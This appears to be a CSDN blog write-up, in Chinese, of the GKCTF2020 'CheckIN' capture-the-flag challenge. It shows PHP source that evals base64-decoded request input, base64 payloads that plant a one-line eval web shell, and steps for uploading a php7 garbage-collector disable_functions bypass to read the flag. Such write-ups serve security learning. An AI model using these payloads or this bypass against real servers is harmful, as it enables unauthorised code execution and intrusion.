[GKCTF2020]CheckIN

打开题目,直接得到源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

源码较为简单,总结一下就是
eval(base64_decode($_REQUEST['Ginkgo']))
存在代码执行漏洞,却发现很多函数被ban了,可能是开启了disable_function,这里先尝试是否能执行phpinfo()
phpinfo(); base64加密之后cGhwaW5mbygpOw==
/?Ginkgo=cGhwaW5mbygpOw==
执行成功,查看一下disable_function中被ban的函数
在这里插入图片描述
所以,这里需要绕过disable_function,先传一句话木马连接上shell
一句话木马eval($_POST[‘A’]); 加密之后得ZXZhbCgkX1BPU1RbJ0EnXSk7
/?Ginkgo=ZXZhbCgkX1BPU1RbJ0EnXSk7
在这里插入图片描述
在根目录文件下发现flag文件和readflag文件,猜测执行readflag就能读取到flag,但是权限等问题无法读取和执行
这里就需要使用绕过disable_function的技巧,通过phpinfo得知,该php的版本为7.3,在该版本下,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3,给出了exp
下载后进行修改,改为执行readflag
在这里插入图片描述
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录
在这里插入图片描述上传成功
在这里插入图片描述
通过之前的一句话来执行文件包含,得到flag
在这里插入图片描述
在这里插入图片描述

©️2020 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页